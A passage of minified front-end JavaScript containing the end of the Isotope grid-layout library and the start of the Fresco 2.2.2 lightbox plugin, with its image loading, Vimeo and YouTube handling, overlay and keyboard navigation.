this.maxY=Math.max(this.maxY,this.y+e.size.outerHeight),this.x+=t,n},i._getContainerSize=function(){return{height:this.maxY}},t}),function(e,t){"function"==typeof define&&define.amd?define("isotope/js/layout-modes/vertical",["../layout-mode"],t):"object"==typeof module&&module.exports?module.exports=t(require("../layout-mode")):t(e.Isotope.LayoutMode)}(window,function(e){"use strict";var t=e.create("vertical",{horizontalAlignment:0}),i=t.prototype;return i._resetLayout=function(){this.y=0},i._getItemLayoutPosition=function(e){e.getSize();var t=(this.isotope.size.innerWidth-e.size.outerWidth)*this.options.horizontalAlignment,i=this.y;return this.y+=e.size.outerHeight,{x:t,y:i}},i._getContainerSize=function(){return{height:this.y}},t}),function(a,r){"function"==typeof define&&define.amd?define(["outlayer/outlayer","get-size/get-size","desandro-matches-selector/matches-selector","fizzy-ui-utils/utils","isotope/js/item","isotope/js/layout-mode","isotope/js/layout-modes/masonry","isotope/js/layout-modes/fit-rows","isotope/js/layout-modes/vertical"],function(e,t,i,n,o,s){return r(a,e,t,i,n,o,s)}):"object"==typeof module&&module.exports?module.exports=r(a,require("outlayer"),require("get-size"),require("desandro-matches-selector"),require("fizzy-ui-utils"),require("isotope/js/item"),require("isotope/js/layout-mode"),require("isotope/js/layout-modes/masonry"),require("isotope/js/layout-modes/fit-rows"),require("isotope/js/layout-modes/vertical")):a.Isotope=r(a,a.Outlayer,a.getSize,a.matchesSelector,a.fizzyUIUtils,a.Isotope.Item,a.Isotope.LayoutMode)}(window,function(e,i,t,n,s,o,a){var r=e.jQuery,l=String.prototype.trim?function(e){return e.trim()}:function(e){return e.replace(/^\s+|\s+$/g,"")},c=i.create("isotope",{layoutMode:"masonry",isJQueryFiltering:!0,sortAscending:!0});c.Item=o,c.LayoutMode=a;var u=c.prototype;u._create=function(){for(var e in this.itemGUID=0,this._sorters={},this._getSorters(),i.prototype._create.call(this),this.modes={},this.filteredItems=this.items,this.sortHistory=["original-order"],a.modes)this._initLayoutMode(e)},u.reloadItems=function(){this.itemGUID=0,i.prototype.reloadItems.call(this)},u._itemize=function(){for(var e=i.prototype._itemize.apply(this,arguments),t=0;t<e.length;t++){e[t].id=this.itemGUID++}return this._updateItemsSortData(e),e},u._initLayoutMode=function(e){var t=a.modes[e],i=this.options[e]||{};this.options[e]=t.options?s.extend(t.options,i):i,this.modes[e]=new t(this)},u.layout=function(){this._isLayoutInited||!this._getOption("initLayout")?this._layout():this.arrange()},u._layout=function(){var e=this._getIsInstant();this._resetLayout(),this._manageStamps(),this.layoutItems(this.filteredItems,e),this._isLayoutInited=!0},u.arrange=function(e){this.option(e),this._getIsInstant();var t=this._filter(this.items);this.filteredItems=t.matches,this._bindArrangeComplete(),this._isInstant?this._noTransition(this._hideReveal,[t]):this._hideReveal(t),this._sort(),this._layout()},u._init=u.arrange,u._hideReveal=function(e){this.reveal(e.needReveal),this.hide(e.needHide)},u._getIsInstant=function(){var e=this._getOption("layoutInstant"),t=void 0!==e?e:!this._isLayoutInited;return this._isInstant=t},u._bindArrangeComplete=function(){function e(){t&&i&&n&&o.dispatchEvent("arrangeComplete",null,[o.filteredItems])}var t,i,n,o=this;this.once("layoutComplete",function(){t=!0,e()}),this.once("hideComplete",function(){i=!0,e()}),this.once("revealComplete",function(){n=!0,e()})},u._filter=function(e){var t=this.options.filter;t=t||"*";for(var i=[],n=[],o=[],s=this._getFilterTest(t),a=0;a<e.length;a++){var r=e[a];if(!r.isIgnored){var l=s(r);l&&i.push(r),l&&r.isHidden?n.push(r):l||r.isHidden||o.push(r)}}return{matches:i,needReveal:n,needHide:o}},u._getFilterTest=function(t){return r&&this.options.isJQueryFiltering?function(e){return r(e.element).is(t)}:"function"==typeof t?function(e){return t(e.element)}:function(e){return n(e.element,t)}},u.updateSortData=function(e){var t;e?(e=s.makeArray(e),t=this.getItems(e)):t=this.items,this._getSorters(),this._updateItemsSortData(t)},u._getSorters=function(){var e=this.options.getSortData;for(var t in e){var i=e[t];this._sorters[t]=d(i)}},u._updateItemsSortData=function(e){for(var t=e&&e.length,i=0;t&&i<t;i++){e[i].updateSortData()}};var d=function(e){if("string"!=typeof e)return e;var t,i,n=l(e).split(" "),o=n[0],s=o.match(/^\[(.+)\]$/),a=(t=s&&s[1],i=o,t?function(e){return e.getAttribute(t)}:function(e){var t=e.querySelector(i);return t&&t.textContent}),r=c.sortDataParsers[n[1]];return e=r?function(e){return e&&r(a(e))}:function(e){return e&&a(e)}};c.sortDataParsers={parseInt:function(e){return parseInt(e,10)},parseFloat:function(e){return parseFloat(e)}},u._sort=function(){if(this.options.sortBy){var e=s.makeArray(this.options.sortBy);this._getIsSameSortBy(e)||(this.sortHistory=e.concat(this.sortHistory));var a,r,t=(a=this.sortHistory,r=this.options.sortAscending,function(e,t){for(var i=0;i<a.length;i++){var n=a[i],o=e.sortData[n],s=t.sortData[n];if(s<o||o<s)return(s<o?1:-1)*((void 0!==r[n]?r[n]:r)?1:-1)}return 0});this.filteredItems.sort(t)}},u._getIsSameSortBy=function(e){for(var t=0;t<e.length;t++)if(e[t]!=this.sortHistory[t])return!1;return!0},u._mode=function(){var e=this.options.layoutMode,t=this.modes[e];if(!t)throw new Error("No layout mode: "+e);return t.options=this.options[e],t},u._resetLayout=function(){i.prototype._resetLayout.call(this),this._mode()._resetLayout()},u._getItemLayoutPosition=function(e){return this._mode()._getItemLayoutPosition(e)},u._manageStamp=function(e){this._mode()._manageStamp(e)},u._getContainerSize=function(){return this._mode()._getContainerSize()},u.needsResizeLayout=function(){return this._mode().needsResizeLayout()},u.appended=function(e){var t=this.addItems(e);if(t.length){var i=this._filterRevealAdded(t);this.filteredItems=this.filteredItems.concat(i)}},u.prepended=function(e){var t=this._itemize(e);if(t.length){this._resetLayout(),this._manageStamps();var i=this._filterRevealAdded(t);this.layoutItems(this.filteredItems),this.filteredItems=i.concat(this.filteredItems),this.items=t.concat(this.items)}},u._filterRevealAdded=function(e){var t=this._filter(e);return this.hide(t.needHide),this.reveal(t.matches),this.layoutItems(t.matches,!0),t.matches},u.insert=function(e){var t=this.addItems(e);if(t.length){var i,n,o=t.length;for(i=0;i<o;i++)n=t[i],this.element.appendChild(n.element);var s=this._filter(t).matches;for(i=0;i<o;i++)t[i].isLayoutInstant=!0;for(this.arrange(),i=0;i<o;i++)delete t[i].isLayoutInstant;this.reveal(s)}};var h=u.remove;return u.remove=function(e){e=s.makeArray(e);var t=this.getItems(e);h.call(this,e);for(var i=t&&t.length,n=0;i&&n<i;n++){var o=t[n];s.removeFrom(this.filteredItems,o)}},u.shuffle=function(){for(var e=0;e<this.items.length;e++){this.items[e].sortData.random=Math.random()}this.options.sortBy="random",this._sort(),this._layout()},u._noTransition=function(e,t){var i=this.options.transitionDuration;this.options.transitionDuration=0;var n=e.apply(this,t);return this.options.transitionDuration=i,n},u.getFilteredItemElements=function(){return this.filteredItems.map(function(e){return e.element})},c}),function(e,t){"function"==typeof define&&define.amd?define(["jquery"],t):"object"==typeof module&&module.exports?module.exports=t(require("jquery")):e.Fresco=t(jQuery)}(this,function($){function baseToString(e){return"string"==typeof e?e:null==e?"":e+""}function Timers(){return this.initialize.apply(this,_slice.call(arguments))}function getURIData(n){var o={type:"image"};return $.each(Types,function(e,t){var i=t.data(n);i&&((o=i).type=e,o.url=n)}),o}function detectExtension(e){var t=(e||"").replace(/\?.*/g,"").match(/\.([^.]{3,4})$/);return t?t[1].toLowerCase():null}function View(){this.initialize.apply(this,_slice.call(arguments))}function Thumbnail(){this.initialize.apply(this,_slice.call(arguments))}var Fresco={};$.extend(Fresco,{version:"2.2.2"}),Fresco.Skins={fresco:{}};var Bounds={viewport:function(){var e={width:$(window).width()};if(Browser.MobileSafari||Browser.Android&&Browser.Gecko){var t=document.documentElement.clientWidth/window.innerWidth;e.height=window.innerHeight*t}else e.height=$(window).height();return e}},Browser=function(i){function e(e){var t=new RegExp(e+"([\\d.]+)").exec(i);return!t||parseFloat(t[1])}return{IE:!(!window.attachEvent||-1!==i.indexOf("Opera"))&&e("MSIE "),Opera:-1<i.indexOf("Opera")&&(!!window.opera&&opera.version&&parseFloat(opera.version())||7.55),WebKit:-1<i.indexOf("AppleWebKit/")&&e("AppleWebKit/"),Gecko:-1<i.indexOf("Gecko")&&-1===i.indexOf("KHTML")&&e("rv:"),MobileSafari:!!i.match(/Apple.*Mobile.*Safari/),Chrome:-1<i.indexOf("Chrome")&&e("Chrome/"),ChromeMobile:-1<i.indexOf("CrMo")&&e("CrMo/"),Android:-1<i.indexOf("Android")&&e("Android "),IEMobile:-1<i.indexOf("IEMobile")&&e("IEMobile/")}}(navigator.userAgent),_slice=Array.prototype.slice,_={isElement:function(e){return e&&1==e.nodeType},String:{capitalize:function(e){return(e=baseToString(e))&&e.charAt(0).toUpperCase()+e.slice(1)}}};$(document.documentElement).on("mousewheel DOMMouseScroll",function(e){var t;if(e.originalEvent.wheelDelta?t=e.originalEvent.wheelDelta/120:e.originalEvent.detail&&(t=-e.originalEvent.detail/3),t){var i=$.Event("fresco:mousewheel");$(e.target).trigger(i,t),i.isPropagationStopped()&&e.stopPropagation(),i.isDefaultPrevented()&&e.preventDefault()}});var Fit={within:function(e,t){for(var i=$.extend({height:!0,width:!0},arguments[2]||{}),n=$.extend({},t),o=1,s=5,a=i.width,r=i.height;0<s&&(a&&n.width>e.width||r&&n.height>e.height);){var l=1,c=1;a&&n.width>e.width&&(l=e.width/n.width),r&&n.height>e.height&&(c=e.height/n.height);o=Math.min(l,c);n={width:Math.round(t.width*o),height:Math.round(t.height*o)},s--}return n.width=Math.max(n.width,0),n.height=Math.max(n.height,0),n}};$.extend($.easing,{frescoEaseInCubic:function(e,t,i,n,o){return n*(t/=o)*t*t+i},frescoEaseInSine:function(e,t,i,n,o){return-n*Math.cos(t/o*(Math.PI/2))+n+i},frescoEaseOutSine:function(e,t,i,n,o){return n*Math.sin(t/o*(Math.PI/2))+i}});var Support=function(){function t(e,t){var i=e.charAt(0).toUpperCase()+e.substr(1);return function(e,t){for(var i in e)if(void 0!==n.style[e[i]])return"prefix"!=t||e[i];return!1}((e+" "+o.join(i+" ")+i).split(" "),t)}var e,n=document.createElement("div"),o="Webkit Moz O ms Khtml".split(" ");return{canvas:(e=document.createElement("canvas"),!(!e.getContext||!e.getContext("2d"))),css:{animation:t("animation"),transform:t("transform"),prefixed:function(e){return t(e,"prefix")}},svg:!!document.createElementNS&&!!document.createElementNS("http://www.w3.org/2000/svg","svg").createSVGRect,touch:function(){try{return!!("ontouchstart"in window||window.DocumentTouch&&document instanceof DocumentTouch)}catch(e){return!1}}()}}();Support.detectMobileTouch=function(){Support.mobileTouch=Support.touch&&(Browser.MobileSafari||Browser.Android||Browser.IEMobile||Browser.ChromeMobile||!/^(Win|Mac|Linux)/.test(navigator.platform))},Support.detectMobileTouch();var ImageReady=function(){return this.initialize.apply(this,Array.prototype.slice.call(arguments))};$.extend(ImageReady.prototype,{supports:{naturalWidth:"naturalWidth"in new Image},initialize:function(e,t,i){return this.img=$(e)[0],this.successCallback=t,this.errorCallback=i,this.isLoaded=!1,this.options=$.extend({method:"naturalWidth",pollFallbackAfter:1e3},arguments[3]||{}),this.supports.naturalWidth&&"onload"!=this.options.method?this.img.complete&&"undefined"!=$.type(this.img.naturalWidth)?void setTimeout($.proxy(function(){0<this.img.naturalWidth?this.success():this.error()},this)):($(this.img).bind("error",$.proxy(function(){setTimeout($.proxy(function(){this.error()},this))},this)),this.intervals=[[1e3,10],[2e3,50],[4e3,100],[2e4,500]],this._ipos=0,this._time=0,this._delay=this.intervals[this._ipos][1],void this.poll()):void setTimeout($.proxy(this.fallback,this))},poll:function(){this._polling=setTimeout($.proxy(function(){if(0<this.img.naturalWidth)this.success();else{if(this._time+=this._delay,this.options.pollFallbackAfter&&this._time>=this.options.pollFallbackAfter&&!this._usedPollFallback&&(this._usedPollFallback=!0,this.fallback()),this._time>this.intervals[this._ipos][0]){if(!this.intervals[this._ipos+1])return void this.error();this._ipos++,this._delay=this.intervals[this._ipos][1]}this.poll()}},this),this._delay)},fallback:function(){var e=new Image;(this._fallbackImg=e).onload=$.proxy(function(){e.onload=function(){},this.supports.naturalWidth||(this.img.naturalWidth=e.width,this.img.naturalHeight=e.height),this.success()},this),e.onerror=$.proxy(this.error,this),e.src=this.img.src},abort:function(){this._fallbackImg&&(this._fallbackImg.onload=function(){}),this._polling&&(clearTimeout(this._polling),this._polling=null)},success:function(){this._calledSuccess||(this._calledSuccess=!0,this.isLoaded=!0,this.successCallback(this))},error:function(){this._calledError||(this._calledError=!0,this.abort(),this.errorCallback&&this.errorCallback(this))}}),$.extend(Timers.prototype,{initialize:function(){this._timers={}},set:function(e,t,i){this._timers[e]=setTimeout(t,i)},get:function(e){return this._timers[e]},clear:function(e){e?this._timers[e]&&(clearTimeout(this._timers[e]),delete this._timers[e]):this.clearAll()},clearAll:function(){$.each(this._timers,function(e,t){clearTimeout(t)}),this._timers={}}});var Type={isVideo:function(e){return/^(youtube|vimeo)$/.test(e)}},Types={image:{extensions:"bmp gif jpeg jpg png webp",detect:function(e){return-1<$.inArray(detectExtension(e),this.extensions.split(" "))},data:function(e){return!!this.detect()&&{extension:detectExtension(e)}}},vimeo:{detect:function(e){var t=/(vimeo\.com)\/([a-zA-Z0-9-_]+)(?:\S+)?$/i.exec(e);return!(!t||!t[2])&&t[2]},data:function(e){var t=this.detect(e);return!!t&&{id:t}}},youtube:{detect:function(e){var t=/(youtube\.com|youtu\.be)\/watch\?(?=.*vi?=([a-zA-Z0-9-_]+))(?:\S+)?$/.exec(e);return t&&t[2]?t[2]:!(!(t=/(youtube\.com|youtu\.be)\/(vi?\/|u\/|embed\/)?([a-zA-Z0-9-_]+)(?:\S+)?$/i.exec(e))||!t[3])&&t[3]},data:function(e){var t=this.detect(e);return!!t&&{id:t}}}},VimeoThumbnail=function(){var e=function(){return this.initialize.apply(this,_slice.call(arguments))};$.extend(e.prototype,{initialize:function(e,t,i){this.url=e,this.successCallback=t,this.errorCallback=i,this.load()},load:function(){var e=n.get(this.url);if(e)return this.successCallback(e.data.url);var t="http"+(window.location&&"https:"==window.location.protocol?"s":"")+":",i=getURIData(this.url).id;this._xhr=$.getJSON(t+"//vimeo.com/api/oembed.json?url="+t+"//vimeo.com/"+i+"&callback=?",$.proxy(function(e){if(e&&e.thumbnail_url){e={url:e.thumbnail_url};n.set(this.url,e),this.successCallback(e.url)}else this.errorCallback()},this))},abort:function(){this._xhr&&(this._xhr.abort(),this._xhr=null)}});var n={cache:[],get:function(e){for(var t=null,i=0;i<this.cache.length;i++)this.cache[i]&&this.cache[i].url==e&&(t=this.cache[i]);return t},set:function(e,t){this.remove(e),this.cache.push({url:e,data:t})},remove:function(e){for(var t=0;t<this.cache.length;t++)this.cache[t]&&this.cache[t].url==e&&delete this.cache[t]}};return e}(),VimeoReady=function(){var e=function(){return this.initialize.apply(this,_slice.call(arguments))};$.extend(e.prototype,{initialize:function(e,t){this.url=e,this.callback=t,this.load()},load:function(){var e=n.get(this.url);if(e)return this.callback(e.data);var t="http"+(window.location&&"https:"==window.location.protocol?"s":"")+":",i=getURIData(this.url).id;this._xhr=$.getJSON(t+"//vimeo.com/api/oembed.json?url="+t+"//vimeo.com/"+i+"&maxwidth=9999999&maxheight=9999999&callback=?",$.proxy(function(e){var t={dimensions:{width:e.width,height:e.height}};n.set(this.url,t),this.callback&&this.callback(t)},this))},abort:function(){this._xhr&&(this._xhr.abort(),this._xhr=null)}});var n={cache:[],get:function(e){for(var t=null,i=0;i<this.cache.length;i++)this.cache[i]&&this.cache[i].url==e&&(t=this.cache[i]);return t},set:function(e,t){this.remove(e),this.cache.push({url:e,data:t})},remove:function(e){for(var t=0;t<this.cache.length;t++)this.cache[t]&&this.cache[t].url==e&&delete this.cache[t]}};return e}(),Options={defaults:{effects:{content:{show:0,hide:0},spinner:{show:150,hide:150},window:{show:440,hide:300},thumbnail:{show:300,delay:150},thumbnails:{slide:0}},keyboard:{left:!0,right:!0,esc:!0},loadedMethod:"naturalWidth",loop:!1,onClick:"previous-next",overflow:!1,overlay:{close:!0},preload:[1,2],position:!0,skin:"fresco",spinner:!0,spinnerDelay:300,sync:!0,thumbnails:"horizontal",ui:"outside",uiDelay:3e3,vimeo:{autoplay:1,api:1,title:1,byline:1,portrait:0,loop:0},youtube:{autoplay:1,controls:1,enablejsapi:1,hd:1,iv_load_policy:3,loop:0,modestbranding:1,rel:0,vq:"hd1080"},initialTypeOptions:{image:{},vimeo:{width:1280},youtube:{width:1280,height:720}}},create:function(e,t,i){i=i||{},(e=e||{}).skin=e.skin||this.defaults.skin;var n=e.skin?$.extend({},Fresco.Skins[e.skin]||Fresco.Skins[this.defaults.skin]):{},o=$.extend(!0,{},this.defaults,n);o.initialTypeOptions&&(t&&o.initialTypeOptions[t]&&(o=$.extend(!0,{},o.initialTypeOptions[t],o)),delete o.initialTypeOptions);var s=$.extend(!0,{},o,e);if(Support.mobileTouch&&"inside"==s.ui&&(s.ui="outside"),(!s.effects||Browser.IE&&Browser.IE<9)&&(s.effects={},$.each(this.defaults.effects,function(t,e){$.each(s.effects[t]=$.extend({},e),function(e){s.effects[t][e]=0})}),s.spinner=!1),s.keyboard&&("boolean"==$.type(s.keyboard)&&(s.keyboard={},$.each(this.defaults.keyboard,function(e,t){s.keyboard[e]=!0})),("vimeo"==t||"youtube"==t)&&$.extend(s.keyboard,{left:!1,right:!1})),!s.overflow||Support.mobileTouch?s.overflow={x:!1,y:!1}:"boolean"==$.type(s.overflow)&&(s.overflow={x:!1,y:!0}),("vimeo"==t||"youtube"==t)&&(s.overlap=!1),(Browser.IE&&Browser.IE<9||Support.mobileTouch)&&(s.thumbnail=!1,s.thumbnails=!1),"youtube"!=t&&(s.width&&!s.maxWidth&&(s.maxWidth=s.width),s.height&&!s.maxHeight&&(s.maxHeight=s.height)),!s.thumbnail&&"boolean"!=$.type(s.thumbnail)){var a=!1;switch(t){case"youtube":a="http"+(window.location&&"https:"==window.location.protocol?"s":"")+":"+"//img.youtube.com/vi/"+i.id+"/0.jpg";break;case"image":case"vimeo":a=!0}s.thumbnail=a}return s}},Overlay={initialize:function(){this.build(),this.visible=!1},build:function(){this.element=$("<div>").addClass("fr-overlay").hide().append($("<div>").addClass("fr-overlay-background")),this.element.on("click",$.proxy(function(){var e=Pages.page;e&&e.view&&e.view.options.overlay&&!e.view.options.overlay.close||Window.hide()},this)),Support.mobileTouch&&this.element.addClass("fr-mobile-touch"),this.element.on("fresco:mousewheel",function(e){e.preventDefault()})},setSkin:function(e){this.skin&&this.element.removeClass("fr-overlay-skin-"+this.skin),this.element.addClass("fr-overlay-skin-"+e),this.skin=e},attach:function(){$(document.body).append(this.element)},detach:function(){this.element.detach()},show:function(e,t){if(this.visible)e&&e();else{this.visible=!0,this.attach(),this.max();var i=Pages.page&&Pages.page.view.options.effects.window.show||0,n=("number"==$.type(t)?t:i)||0;this.element.stop(!0).fadeTo(n,1,e)}},hide:function(e,t){if(this.visible){var i=Pages.page&&Pages.page.view.options.effects.window.hide||0,n=("number"==$.type(t)?t:i)||0;this.element.stop(!0).fadeOut(n||0,$.proxy(function(){this.detach(),this.visible=!1,e&&e()},this))}else e&&e()},getScrollDimensions:function(){var o={};return $.each(["width","height"],function(e,t){var i=t.substr(0,1).toUpperCase()+t.substr(1),n=document.documentElement;o[t]=(Browser.IE?Math.max(n["offset"+i],n["scroll"+i]):Browser.WebKit?document.body["scroll"+i]:n["scroll"+i])||0}),o},max:function(){var e;if(Browser.MobileSafari&&Browser.WebKit&&Browser.WebKit<533.18&&(e=this.getScrollDimensions(),this.element.css(e)),Browser.IE&&Browser.IE<9){var t=Bounds.viewport();this.element.css({height:t.height,width:t.width})}Support.mobileTouch&&!e&&this.element.css({height:this.getScrollDimensions().height})}},Window={initialize:function(){this.queues=[],this.queues.hide=$({}),this.pages=[],this._tracking=[],this._first=!0,this.timers=new Timers,this.build(),this.setSkin(Options.defaults.skin)},build:function(){if(this.element=$("<div>").addClass("fr-window fr-measured").hide().append(this._box=$("<div>").addClass("fr-box").append(this._pages=$("<div>").addClass("fr-pages"))).append(this._thumbnails=$("<div>").addClass("fr-thumbnails")),Overlay.initialize(),Pages.initialize(this._pages),Thumbnails.initialize(this._thumbnails),Spinner.initialize(),UI.initialize(),this.element.addClass("fr"+(Support.mobileTouch?"":"-no")+"-mobile-touch"),this.element.addClass("fr"+(Support.svg?"":"-no")+"-svg"),Browser.IE)for(var e=7;e<=9;e++)Browser.IE<e&&this.element.addClass("fr-ltIE"+e);this.element.on("fresco:mousewheel",function(e){e.preventDefault()})},attach:function(){this._attached||($(document.body).append(this.element),this._attached=!0)},detach:function(){this._attached&&(this.element.detach(),this._attached=!1)},setSkin:function(e){this._skin&&this.element.removeClass("fr-window-skin-"+this._skin),this.element.addClass("fr-window-skin-"+e),Overlay.setSkin(e),this._skin=e},setShowingType:function(e){this._showingType!=e&&(this._showingType&&(this.element.removeClass("fr-showing-type-"+this._showingType),Type.isVideo(this._showingType)&&this.element.removeClass("fr-showing-type-video")),this.element.addClass("fr-showing-type-"+e),Type.isVideo(e)&&this.element.addClass("fr-showing-type-video"),this._showingType=e)},startObservingResize:function(){this._onWindowResizeHandler||$(window).on("resize orientationchange",this._onWindowResizeHandler=$.proxy(this._onWindowResize,this))},stopObservingResize:function(){this._onWindowResizeHandler&&($(window).off("resize orientationchange",this._onWindowResizeHandler),this._onWindowResizeHandler=null)},_onScroll:function(){Support.mobileTouch&&this.timers.set("scroll",$.proxy(this.adjustToScroll,this),0)},_onWindowResize:function(){var e;(e=Pages.page)&&(Thumbnails.fitToViewport(),this.updateBoxDimensions(),e.fitToBox(),UI.update(),UI.adjustPrevNext(null,0),Spinner.center(),Overlay.max(),UI._onWindowResize(),this._onScroll())},adjustToScroll:function(){Support.mobileTouch&&this.element.css({top:$(window).scrollTop()})},getBoxDimensions:function(){return this._boxDimensions},updateBoxDimensions:function(){if(Pages.page){var e=Bounds.viewport(),t=Thumbnails.getDimensions(),i="horizontal"==Thumbnails._orientation;this._boxDimensions={width:i?e.width:e.width-t.width,height:i?e.height-t.height:e.height},this._boxPosition={top:0,left:i?0:t.width},this._box.css($.extend({},this._boxDimensions,this._boxPosition))}},show:function(e,t){if(this.visible)e&&e();else{this.visible=!0,this.opening=!0,this.attach(),this.timers.clear("show-window"),this.timers.clear("hide-overlay"),this.adjustToScroll();var i=("number"==$.type(t)?t:Pages.page&&Pages.page.view.options.effects.window.show)||0,n=2;Overlay[Pages.page&&Pages.page.view.options.overlay?"show":"hide"](function(){e&&--n<1&&e()},i),this.timers.set("show-window",$.proxy(function(){this._show($.proxy(function(){this.opening=!1,e&&--n<1&&e()},this),i)},this),1<i?Math.min(.5*i,50):1)}},_show:function(e,t){var i=("number"==$.type(t)?t:Pages.page&&Pages.page.view.options.effects.window.show)||0;this.element.stop(!0).fadeTo(i,1,e)},hide:function(t){if(this.view){var e=this.queues.hide;e.queue([]),this.timers.clear("show-window"),this.timers.clear("hide-overlay");var i=Pages.page?Pages.page.view.options.effects.window.hide:0;e.queue($.proxy(function(e){Pages.stop(),Spinner.hide(),e()},this)),e.queue($.proxy(function(e){UI.disable(),UI.hide(null,i),Keyboard.disable(),e()},this)),e.queue($.proxy(function(e){var t=2;this._hide(function(){--t<1&&e()},i),this.timers.set("hide-overlay",$.proxy(function(){Overlay.hide(function(){--t<1&&e()},i)},this),1<i?Math.min(.5*i,150):1),this._first=!0},this)),e.queue($.proxy(function(e){this._reset(),this.stopObservingResize(),Pages.removeAll(),Thumbnails.clear(),this.timers.clear(),this._position=-1;var t=Pages.page&&Pages.page.view.options.afterHide;"function"==$.type(t)&&t.call(Fresco),this.view=null,this.opening=!1,this.closing=!1,this.detach(),e()},this)),"function"==$.type(t)&&e.queue($.proxy(function(e){t(),e()},this))}},_hide:function(e,t){var i=("number"==$.type(t)?t:Pages.page&&Pages.page.view.options.effects.window.hide)||0;this.element.stop(!0).fadeOut(i,e)},load:function(e,t){this.views=e,this.attach(),Thumbnails.load(e),Pages.load(e),this.startObservingResize(),t&&this.setPosition(t)},setPosition:function(e,t){this._position=e,this.view=this.views[e-1],this.stopHideQueue(),this.page=Pages.show(e,$.proxy(function(){t&&t()},this))},stopHideQueue:function(){this.queues.hide.queue([])},_reset:function(){this.visible=!1,UI.hide(null,0),UI.reset()},mayPrevious:function(){return this.view&&this.view.options.loop&&this.views&&1<this.views.length||1!=this._position},previous:function(e){var t=this.mayPrevious();(e||t)&&this.setPosition(this.getSurroundingIndexes().previous)},mayNext:function(){var e=this.views&&1<this.views.length;return this.view&&this.view.options.loop&&e||e&&1!=this.getSurroundingIndexes().next},next:function(e){var t=this.mayNext();(e||t)&&this.setPosition(this.getSurroundingIndexes().next)},getSurroundingIndexes:function(){if(!this.views)return{};var e=this._position,t=this.views.length;return{previous:e<=1?t:e-1,next:t<=e?1:e+1}}},Keyboard={enabled:!1,keyCode:{left:37,right:39,esc:27},enable:function(e){this.disable(),e&&($(document).on("keydown",this._onKeyDownHandler=$.proxy(this.onKeyDown,this)).on("keyup",this._onKeyUpHandler=$.proxy(this.onKeyUp,this)),this.enabled=e)},disable:function(){this.enabled=!1,this._onKeyUpHandler&&($(document).off("keyup",this._onKeyUpHandler).off("keydown",this._onKeyDownHandler),this._onKeyUpHandler=this._onKeyDownHandler=null)},onKeyDown:function(e){if(this.enabled){var t=this.getKeyByKeyCode(e.keyCode);if(t&&(!t||!this.enabled||this.enabled[t]))switch(e.preventDefault(),e.stopPropagation(),t){case"left":Window.previous();break;case"right":Window.next()}}},onKeyUp:function(e){if(this.enabled){var t=this.getKeyByKeyCode(e.keyCode);if(t&&(!t||!this.enabled||this.enabled[t]))switch(t){case"esc":Window.hide()}}},getKeyByKeyCode:function(e){for(var t in this.keyCode)if(this.keyCode[t]==e)return t;return null}},Page=function(){function e(){return this.initialize.apply(this,_slice.call(arguments))}var n=0,i={},o=$("<div>").addClass("fr-stroke fr-stroke-top fr-stroke-horizontal").append($("<div>").addClass("fr-stroke-color")).add($("<div>").addClass("fr-stroke fr-stroke-bottom fr-stroke-horizontal").append($("<div>").addClass("fr-stroke-color"))).add($("<div>").addClass("fr-stroke fr-stroke-left fr-stroke-vertical").append($("<div>").addClass("fr-stroke-color"))).add($("<div>").addClass("fr-stroke fr-stroke-right fr-stroke-vertical").append($("<div>").addClass("fr-stroke-color")));return $.extend(e.prototype,{initialize:function(e,t,i){this.view=e,this.dimensions={width:0,height:0},this.uid=n++,this._position=t,this._total=i,this._fullClick=!1,this._visible=!1,this.queues={},this.queues.showhide=$({})},create:function(){if(!this._created){Pages.element.append(this.element=$("<div>").addClass("fr-page").append(this.container=$("<div>").addClass("fr-container")).css({opacity:0}).hide());var e=this.view.options.position&&1<this._total;if(e&&this.element.addClass("fr-has-position"),(this.view.caption||e)&&(this.element.append(this.info=$("<div>").addClass("fr-info").append($("<div>").addClass("fr-info-background")).append(o.clone(!0)).append(this.infoPadder=$("<div>").addClass("fr-info-padder"))),e&&(this.element.addClass("fr-has-position"),this.infoPadder.append(this.pos=$("<div>").addClass("fr-position").append($("<span>").addClass("fr-position-text").html(this._position+" / "+this._total)))),this.view.caption&&this.infoPadder.append(this.caption=$("<div>").addClass("fr-caption").html(this.view.caption))),this.container.append(this.background=$("<div>").addClass("fr-content-background")).append(this.content=$("<div>").addClass("fr-content")),"image"==this.view.type&&(this.content.append(this.image=$("<img>").addClass("fr-content-element").attr({src:this.view.url})),this.content.append(o.clone(!0))),e&&"outside"==this.view.options.ui&&this.container.append(this.positionOutside=$("<div>").addClass("fr-position-outside").append($("<div>").addClass("fr-position-background")).append($("<span>").addClass("fr-position-text").html(this._position+" / "+this._total))),"inside"==this.view.options.ui){this.content.append(this.previousInside=$("<div>").addClass("fr-side fr-side-previous fr-toggle-ui").append($("<div>").addClass("fr-side-button").append($("<div>").addClass("fr-side-button-background")).append($("<div>").addClass("fr-side-button-icon")))).append(this.nextInside=$("<div>").addClass("fr-side fr-side-next fr-toggle-ui").append($("<div>").addClass("fr-side-button").append($("<div>").addClass("fr-side-button-background")).append($("<div>").addClass("fr-side-button-icon")))).append(this.closeInside=$("<div>").addClass("fr-close fr-toggle-ui").append($("<div>").addClass("fr-close-background")).append($("<div>").addClass("fr-close-icon"))),(this.view.caption||e&&this.view.grouped.caption)&&(this.content.append(this.infoInside=$("<div>").addClass("fr-info fr-toggle-ui").append($("<div>").addClass("fr-info-background")).append(o.clone(!0)).append(this.infoPadderInside=$("<div>").addClass("fr-info-padder"))),e&&this.infoPadderInside.append(this.posInside=$("<div>").addClass("fr-position").append($("<span>").addClass("fr-position-text").html(this._position+" / "+this._total))),this.view.caption&&this.infoPadderInside.append(this.captionInside=$("<div>").addClass("fr-caption").html(this.view.caption))),this.view.caption||!e||this.view.grouped.caption||this.content.append(this.positionInside=$("<div>").addClass("fr-position-inside fr-toggle-ui").append($("<div>").addClass("fr-position-background")).append($("<span>").addClass("fr-position-text").html(this._position+" / "+this._total)));var t=this.view.options.loop&&1<this._total||1!=this._position,i=this.view.options.loop&&1<this._total||this._position<this._total;this.previousInside[(t?"remove":"add")+"Class"]("fr-side-disabled"),this.nextInside[(i?"remove":"add")+"Class"]("fr-side-disabled")}$.each(["x","y"],$.proxy(function(e,t){this.view.options.overflow[t]&&this.element.addClass("fr-overflow-"+t)},this)),this.element.addClass("fr-type-"+this.view.type),Type.isVideo(this.view.type)&&this.element.addClass("fr-type-video"),this._total<2&&this.element.addClass("fr-no-sides"),this._created=!0}},_getSurroundingPages:function(){var e;if(!(e=this.view.options.preload))return[];for(var 